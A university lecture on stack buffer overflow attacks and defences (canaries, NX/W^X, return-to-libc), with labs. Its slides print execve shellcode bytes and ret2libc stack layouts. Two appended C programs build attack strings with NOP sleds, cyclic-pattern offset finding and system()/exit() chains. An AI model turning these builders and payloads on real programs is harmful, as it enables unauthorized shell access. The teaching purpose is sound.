Milan Patnaik, Indian Institute of Technology Madras

BUFFER OVERFLOWS : STACK
Sources for vulnerability statistics: https://www.cvedetails.com/ and https://www.mitre.org/ (CVE-2021 : 152)

AGENDA : CLASS
• Buffer overflow
  - Executable stack attacks
  - Executable stack attack prevention: canaries, W^X
  - Non-executable stack attacks: return-to-libc attack, return oriented programming
  - Non-executable stack attack prevention: ASLR
  - Heap exploits

AGENDA : LABS
• Lab1a. Executable stack attacks.
• Lab1b. Return-to-libc attack.
• Lab2a. Return oriented programming.
• Lab2b. Exploiting large binaries.

EXECUTABLE STACK ATTACKS

PARTS OF BINARY EXPLOITS
Two parts:
• Subvert execution: change the normal execution behaviour of the program.
• Payload: the code which the attacker wants to execute.

SUBVERT EXECUTION
• In application software: SQL injection.
• In system software: buffer overflows and overreads; heap bugs (double free, use after free); integer overflows; format strings; control-flow hijacking.
• In peripherals: e.g. USB drives in printers.
• In hardware: hardware Trojans.
• Covert channels: can exist in hardware or software. These do not really subvert execution, but can lead to confidentiality attacks.

BUFFER OVERFLOWS IN THE STACK
• We need to first know how a stack is managed.
• Executable stacks.
[1] Chris Anley, Felix Lindner, and John Heasman, "The Shellcoder's Handbook"
STACK IN A PROGRAM (WHEN A FUNCTION IS EXECUTING)
(Figure from [1].) One frame, from the top (high addresses) to the bottom:
  parameters for function
  return address
  previous frame pointer    <- %ebp (frame pointer) points here
  locals of function        <- %esp (stack pointer) points to the bottom
The 32-bit x86 code that builds it:
  In main:      push $3 ; push $2 ; push $1 ; call function
  In function:  push %ebp ; movl %esp, %ebp ; sub $20, %esp
Each push moves %esp down; call pushes the return address; the callee saves the caller's %ebp, makes %ebp point at that saved copy, and reserves space for its locals below it.

STACK USAGE (EXAMPLE)
Stack for a call function(1, 2, 3) with locals char buffer1[5]; char buffer2[10]; (top to bottom):
  address        stored data
  1000 to 997    3
  996 to 993     2
  992 to 989     1
  988 to 985     return address
  984 to 981     stored frame pointer (saved %ebp); %ebp points here
  980 to 976     buffer1
  975 to 966     buffer2
  965            stack pointer (%esp)

STACK USAGE contd
What is the output of the following?
• printf("%x", buffer2) prints 966, the address of buffer2[0].
• printf("%x", &buffer2[10]) prints 976, which is the address of buffer1[0].
Therefore buffer2[10] is the same byte as buffer1[0]: C performs no bounds check, so a write past the end of buffer2 silently continues into buffer1, then into the stored frame pointer, then into the return address.

A BUFFER OVERFLOW MODIFYING THE RETURN ADDRESS
buffer2[19] is at address 966 + 19 = 985, the lowest byte of the return address. So, in the same frame, writing a 4-byte value there,
  buffer2[19] = &arbitrary memory location
replaces the return address. When function returns, execution continues at that location instead of in main. Pointing it at the payload location (for example the buffer that holds the attacker's code) gives the attacker control of execution.

BIG PICTURE OF THE EXPLOIT
Fill the buffer and everything above it as follows, where BA is the address of the buffer:
  [exploit code] [BA] [BA] [BA] [BA] ... [BA]
The exploit code sits at the start of the buffer, and every following 4-byte slot, up to and past the return address, holds BA. When the function returns, the return address (now BA) sends execution into the exploit code.

FIND LOCATION OF RETURN ADDRESS
• Fill the stack with distinct, recognisable values (R1, R2, ..., R10) and run the program.
• Check the address reported in the fault: a segmentation fault at R6 means the slot that held R6 is the return address.
• Find the offset of R6 from the start of the buffer; that is where BA must be written.

PAYLOAD
• Let's say the attacker wants to spawn a shell, i.e. execute, from machine code, the equivalent of execve on "/bin/sh" (the slide's code figure is not reproduced here; the bytes in step 1 are that shellcode).

STEP 1 : GET MACHINE CODES
• objdump --disassemble-all shellcode.o
• Get the machine code bytes: "eb 1e 5e 89 76 08 c6 46 07 00 c7 46 0c 00 00 00 00 b8 0b 00 00 00 89 f3 8d 4e 08 8d 56 0c cd 80 cd 80"
• If there are 00 bytes, replace the instructions that produce them with equivalent ones that do not (e.g. movl $0,%eax -> xorl %eax,%eax; movl $0xb,%eax -> movb $0xb,%al). The string functions that deliver the payload (strcpy and friends) stop copying at the first NUL byte, so a 00 inside the shellcode would truncate it.

STEP 2 : FIND BUFFER OVERFLOW
• Find a buffer defined on the stack that is written without a length check (the slide's figure shows such a buffer).

STEP 3 : PUT MACHINE CODE IN LARGE STRING
• large_string: [shellcode][ ... ]
STEP 3 (contd) : FILL UP LARGE STRING WITH BA
• large_string: [shellcode][BA][BA][BA][BA][BA][BA][BA][BA], where BA is the address of buffer.

FINAL STATE OF STACK
• Copy large_string into buffer (strcpy(buffer, large_string)), overflowing it.
• buffer now holds [shellcode][BA][BA]... and the return-address slot holds BA. Note that strcpy itself returns normally; the shellcode runs when the function that owns buffer returns and pops BA as its return address.

PUTTING IT ALL TOGETHER
  bash$ gcc overflow1.c
  bash$ ./a.out
  $
The "$" prompt is the new shell spawned by the payload.

AN ALTERNATE
Put the exploit code above the return address instead, and fill everything below it with addresses:
  [BA] [BA] ... [BA over the return address] [exploit code]
Here BA must be the address of the exploit code, i.e. a stack address just above the return-address slot, rather than the buffer address. This layout helps when the buffer is too small to hold the shellcode.

ACCURACY
• Increase accuracy with a NOP sled: precede the shellcode with a run of NOP instructions (0x90 on x86) and point BA into the middle of it. Any guess that lands anywhere in the sled slides down into the shellcode, so BA no longer has to be exact.

DEFENSES
• Eliminate program flaws that could lead to subversion of execution: safer programming languages, safer libraries, hardware enhancements, static analysis.
• If they can't be eliminated, make it more difficult for malware to subvert execution: W^X, ASLR, canaries.
• If the payload still manages to execute, try to detect its execution at runtime: payload run-time detection using learning techniques (ANNs) and payload signatures.
• If it can't be detected at runtime, try to restrict what the malware can do: sandbox the system so that the payload affects only part of it (access control, virtualization, TrustZone, SGX).
• Track information flow (DIFT, dynamic information flow tracking) to ensure the payload does not steal sensitive information.

PREVENTING BUFFER OVERFLOWS WITH CANARIES AND W^X

CANARIES
Stack (top to bottom): 3, 2, 1, ret addr, sfp (saved %ebp), [canary inserted here], buffer1, buffer2.
• A canary is a known (pseudo-random) value placed on the stack between the locals and the saved frame pointer / return address, to monitor for buffer overflows.
• Before the function returns, the stored canary is compared with the original. A change in its value indicates that a buffer overflow ran through it; 'stack smashing' is detected and the program is aborted before the corrupted return address is used.

CANARIES AND GCC
• As of gcc 4.4.5, canaries are not added to functions by default. (Newer distribution toolchains commonly enable -fstack-protector-strong by default; check your compiler before relying on either behaviour.)
• They add overhead, since the store and the check execute in every protected function.
• Canaries are added with the -fstack-protector option. With it, gcc instruments only the functions selected by a heuristic, for example:
  - a character buffer of at least 8 bytes is allocated;
  - string operations such as strcpy, scanf, etc. are used.
• Canaries can be evaded quite easily by an overwrite that does not alter the canary: e.g. corrupting other locals or a function pointer that lies between the buffer and the canary, writing the return address through a corrupted pointer, or leaking the canary first (e.g. via a format string bug) and writing it back unchanged.

CANARIES EXAMPLE (figure)
• Without canaries, the return address on the stack gets overwritten, resulting in a segmentation fault when the function returns.
• With canaries, the program gets aborted with a "stack smashing detected" message.

CANARY INTERNALS (figure: disassembly without and with canaries)
• Prologue: store the canary onto the stack, just above the locals.
• Epilogue: verify that the canary has not changed; if it has, call __stack_chk_fail, which aborts the program.
• gs is a segment register that addresses thread-local data; here it is used for picking out the per-thread canary value (on 32-bit Linux, %gs:0x14).

NON-EXECUTABLE STACKS (W^X)
• Intel/AMD processors provide the NX (AMD) / XD (Intel) page-table bit to mark non-code regions, such as the stack, as non-executable.
  - A fault is raised when the processor tries to execute an instruction from a page marked non-executable. W^X: a page is writable or executable, never both.
• Works for most programs.
  - Supported by the Linux kernel since 2004.
  - Supported by Windows XP Service Pack 2 and Windows Server 2003, where it is called DEP (Data Execution Prevention).
• Does not work for some programs that NEED to execute code that they generate at runtime.
  - e.g. a JIT compiler constructs machine code from external data and then executes it. Such a program must mark those pages executable itself (e.g. with mprotect) or be exempted from W^X.
• Will a non-executable stack prevent buffer overflow attacks? No. The overflow still overwrites the return address; only the code placed on the stack can no longer run. The attacker instead redirects execution to code that already exists in the process.

RETURN-TO-LIBC ATTACKS

RETURN TO LIBC
• The executable-stack layout, [exploit code][BA][BA]... with the return address pointing into buffer, will not work if the NX bit is set on the stack.
• Instead, replace the return address with the address of a function F1 that is already present in the process, such as one in libc: [F1 addr][F1 addr] ... [F1 addr over the return address].
• Process memory: text, data, heap, stack. F1 lives in the (libc) text segment, which is mapped executable, so this bypasses W^X: F1 can legally be executed.

F1 = system()
• One option is the libc function system(): system("/bin/sh") would create a shell (there could be other options as well).
• So we need to:
  - find the address of system in the process (it does not have to be a user-defined function; it can be any function in one of the linked libraries);
  - supply an address that points to the string "/bin/sh".

THE RETURN-TO-LIBC ATTACK
Stack after the overflow (bottom to top): buffer filled with F1ptr ..., [F1ptr over the return address], [F1ptr], [shell ptr].
• The return-address slot holds F1ptr, the address of system() in libc.
• The next word is what system() will see as its own return address (here just another F1ptr).
• The word after that is system()'s first argument: a pointer to "/bin/sh".
When the vulnerable function executes ret, it "returns" into system(), which finds its argument exactly where the calling convention says a caller would have pushed it.

UNDERSTAND THE STACK (figures from [1])
SYSTEM CALL (figure from [1])

FIND ADDRESS OF SYSTEM IN THE EXECUTABLE (figure)

FIND ADDRESS OF /bin/sh
• Every process stores its environment variables at the bottom of the stack (the highest stack addresses).
• We need to find this region and extract the address of the string "/bin/sh" from it (for example from a SHELL=/bin/sh entry, or from a variable the attacker placed in the environment).
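The two pieces the slides ask for, finding "/bin/sh" in a mapped region and laying out the system()/exit()/"/bin/sh" words over the return address, as an added C example that is not from the slides or the lecture's lab code. It targets a 32-bit little-endian stack; the environment image, the offset 19 (the lecture's frame), and the libc addresses 0x28085260 and 0x281130d0 are constructed test data, not values read from a real process.

```c
/* Added example, not from the slides: build the return-to-libc attack string
 * for a 32-bit little-endian target. The addresses and the "environment
 * image" used below are constructed test data, not values read from a real
 * process; in practice they come from a debugger and the target's stack. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Store a 32-bit value the way the CPU will read it back: little-endian. */
static void put32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

/* FIND ADDRESS OF /bin/sh: scan a copy of a mapped region (the environment
 * area at the bottom of the stack, or libc itself) for the string, including
 * its NUL terminator, which system() relies on. `base` is the address at
 * which the copy was mapped in the target. Returns 0 if not found. */
uint32_t find_binsh(const unsigned char *image, size_t len, uint32_t base) {
    static const char needle[] = "/bin/sh";          /* 8 bytes with the NUL */
    for (size_t i = 0; i + sizeof needle <= len; i++)
        if (memcmp(image + i, needle, sizeof needle) == 0)
            return base + (uint32_t)i;
    return 0;
}

/* THE FINAL EXPLOIT STACK / A CLEAN EXIT:
 *   [filler, ret_off bytes][&system][return address for system][&"/bin/sh"]
 * ret_off is the distance from the start of the vulnerable buffer to the
 * saved return address (19 in the lecture's frame). ret_after is what
 * system() returns to: a placeholder, or &exit for a clean exit.
 * Returns the string length, or 0 if it would not fit or if any address
 * contains a 0x00 byte (strcpy would stop copying there). */
size_t build_ret2libc(unsigned char *out, size_t cap, size_t ret_off,
                      uint32_t system_addr, uint32_t ret_after,
                      uint32_t binsh_addr) {
    size_t total = ret_off + 12;
    if (total + 1 > cap) return 0;
    memset(out, 'A', ret_off);                 /* anything non-zero up to the slot */
    put32(out + ret_off,     system_addr);     /* overwrites the return address    */
    put32(out + ret_off + 4, ret_after);       /* popped when system() returns     */
    put32(out + ret_off + 8, binsh_addr);      /* system()'s first argument        */
    out[total] = 0;                            /* terminator for the delivering strcpy */
    if (strlen((const char *)out) != total) return 0;   /* interior NUL: truncated */
    return total;
}

int main(void) {
    /* Constructed stand-in for the environment area, "mapped" at 0xbfbffe00. */
    unsigned char env[64] = {0};
    memcpy(env + 20, "SHELL=/bin/sh", 14);
    uint32_t binsh = find_binsh(env, sizeof env, 0xbfbffe00u);

    unsigned char attack[64];
    size_t n = build_ret2libc(attack, sizeof attack, 19,
                              0x28085260u /* system */, 0x281130d0u /* exit */, binsh);
    printf("/bin/sh at 0x%08x, attack string is %zu bytes:\n", binsh, n);
    for (size_t i = 0; i < n; i++)
        printf("%02x%c", attack[i], (i + 1) % 16 == 0 ? '\n' : ' ');
    putchar('\n');
    return n ? 0 : 1;
}
```

The NUL check at the end of build_ret2libc is the practical reason the attack is built from whole 4-byte addresses: if system() or exit() happens to live at an address with a zero byte, strcpy delivers only part of the chain and the attacker needs a different copy primitive or a different gadget address.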
FIND ADDRESS OF /bin/sh (figure)

THE FINAL EXPLOIT STACK
  buffer ..............  xxx xxx xxx   filler up to the return address
  return address ......  0x28085260    address of system() in libc
  next word ...........  dead          placeholder return address for system()
  next word ...........  0xbfbffe25    address of the string "/bin/sh"
(The addresses are those of the slides' example run; they differ from system to system.)

A CLEAN EXIT
  buffer ..............  xxx xxx xxx
  return address ......  0x28085260    system() in libc
  next word ...........  0x281130d0    exit() in libc
  next word ...........  0xbfbffe25    "/bin/sh"
With exit() as system()'s return address, the process terminates cleanly when the shell exits, instead of crashing at the placeholder address.

LIMITATION OF RET2LIBC
• Limits what the attacker can do: only existing functions in the library can be called, with their arguments laid out on the stack.
• Those functions could be removed (or restricted) in the library.

THE ATTACKER'S PLAN
• Find a bug in the source code (e.g. the kernel) that can be exploited:
  - eyeballing;
  - noticing something in the patches;
  - following CVEs.
• Use that bug to insert malicious code, or to redirect execution to existing code, to perform something nefarious, such as getting root privileges in the kernel.
• The attacker depends upon knowing where these functions reside in memory, and assumes that many systems use the same address mapping. Therefore one exploit may spread easily. (Removing this assumption is the job of ASLR, the next prevention on the agenda.)
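Going back to the executable-stack exploit (FIND LOCATION OF RETURN ADDRESS, STEP 1 to STEP 3, AN ALTERNATE and ACCURACY), here is the attacker-side string construction as an added C example, not from the slides or the lab handouts. It swaps the slides' "random values" for a non-repeating pattern, so the faulting EIP directly yields the offset, and it builds both layouts the slides draw (code below the return address, or above it when the buffer is too small). The buffer addresses 0xbfbffd10 and 0xbfbffcfb and the eight-byte int3 stand-in payload are constructed test data; the only real bytes are the slide's STEP 1 shellcode, included to show that its 0x00 bytes make it undeliverable by strcpy.

```c
/* Added example, not from the slides: the attacker-side steps of the
 * executable-stack exploit (FIND LOCATION OF RETURN ADDRESS, STEP 1 to
 * STEP 3, AN ALTERNATE, ACCURACY) for a 32-bit x86 target. Addresses and the
 * stand-in payload are constructed test data. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90  /* x86 one-byte nop: the sled filler */

/* FIND LOCATION OF RETURN ADDRESS: instead of arbitrary values, fill the
 * buffer with the non-repeating pattern Aa0Aa1Aa2...Ab0... Every 4-byte window
 * is distinct for the lengths used here, so the value reported as the
 * faulting EIP identifies its own offset in the buffer. */
size_t pattern_create(char *out, size_t n) {
    size_t k = 0;
    for (char a = 'A'; a <= 'Z' && k < n; a++)
        for (char b = 'a'; b <= 'z' && k < n; b++)
            for (char c = '0'; c <= '9' && k < n; c++) {
                const char chunk[3] = { a, b, c };
                for (int i = 0; i < 3 && k < n; i++) out[k++] = chunk[i];
            }
    return k;
}

static void put32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

/* eip: the faulting address from the crash, i.e. the 4 pattern bytes that
 * landed in the return-address slot, read little-endian. Returns their
 * offset in a pattern of length n, or -1 if the value is not from the pattern. */
long pattern_offset(uint32_t eip, size_t n) {
    char pat[4096];
    unsigned char needle[4];
    if (n > sizeof pat) n = sizeof pat;
    size_t len = pattern_create(pat, n);
    put32(needle, eip);
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* STEP 1 caveat: strcpy() stops at the first 0x00, so neither the shellcode
 * nor the address written over the return address may contain one. */
static int has_nul(const unsigned char *p, size_t len) { return memchr(p, 0, len) != NULL; }

/* STEP 3 plus AN ALTERNATE and ACCURACY: build the attack string.
 *   out      receives `size` bytes and a terminating NUL (needs size + 1 bytes)
 *   ret_off  offset of the saved return address from the start of the buffer
 *   buf_addr guessed address of the buffer; *target receives the BA actually used
 * Layout 1, shellcode fits below the return address:
 *   [NOP sled][shellcode][BA][BA]...                     BA -> middle of the sled
 * Layout 2 (AN ALTERNATE), it does not fit:
 *   [BA]...[BA over the return address][NOP sled][shellcode]   BA -> middle of that sled
 * Returns size on success, 0 on error. */
size_t build_stack_exploit(unsigned char *out, size_t size, size_t ret_off,
                           const unsigned char *sc, size_t sc_len,
                           uint32_t buf_addr, uint32_t *target) {
    size_t sled, sled_at, code_at, ba_from, ba_to;
    unsigned char ba[4];
    if (has_nul(sc, sc_len) || ret_off + 4 > size) return 0;
    if (sc_len <= ret_off) {                       /* layout 1 */
        sled = ret_off - sc_len; sled_at = 0; code_at = sled;
        ba_from = ret_off; ba_to = size;
        *target = buf_addr + (uint32_t)(sled / 2);
    } else {                                       /* layout 2 */
        if (ret_off + 4 + sc_len > size) return 0;
        ba_from = ret_off % 4; ba_to = ret_off + 4; /* keep BA words aligned with ret_off */
        sled = size - ba_to - sc_len; sled_at = ba_to; code_at = size - sc_len;
        *target = buf_addr + (uint32_t)(ba_to + sled / 2);
    }
    put32(ba, *target);
    if (has_nul(ba, 4)) return 0;    /* an address with a 0x00 byte cannot be strcpy'd */
    memset(out, 'A', size);          /* filler for any byte not covered below */
    memset(out + sled_at, NOP, sled);
    memcpy(out + code_at, sc, sc_len);
    for (size_t i = ba_from; i + 4 <= ba_to; i += 4) memcpy(out + i, ba, 4);
    out[size] = 0;
    return size;
}

/* Machine code from the slide's STEP 1; note the 0x00 bytes in it. */
static const unsigned char slide_shellcode[] = {
    0xeb,0x1e,0x5e,0x89,0x76,0x08,0xc6,0x46,0x07,0x00,0xc7,0x46,0x0c,0x00,0x00,0x00,0x00,
    0xb8,0x0b,0x00,0x00,0x00,0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,0xcd,0x80,0xcd,0x80 };
/* Constructed NUL-free stand-in payload (eight int3 traps), not a real shell. */
static const unsigned char stub_shellcode[8] = { 0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc };

int main(void) {
    unsigned char out[41]; uint32_t ba;
    /* A crash with EIP = 0x61413661 ("a6Aa") after a 100-byte pattern -> offset 19. */
    printf("return address at offset %ld\n", pattern_offset(0x61413661u, 100));
    printf("slide shellcode usable as-is: %s\n",
           build_stack_exploit(out, 40, 19, slide_shellcode, sizeof slide_shellcode,
                               0xbfbffd10u, &ba) ? "yes" : "no (contains 0x00)");
    if (build_stack_exploit(out, 40, 19, stub_shellcode, sizeof stub_shellcode, 0xbfbffd10u, &ba))
        printf("built 40-byte string, BA = 0x%08x\n", ba);
    return 0;
}
```

The offset returned by pattern_offset is the ret_off that build_stack_exploit needs; with the lecture's frame (buffer2 at 966, return address at 985) it is 19, which is why layout 1 places the stub payload right below the return-address slot and the sled fills the remaining 11 bytes.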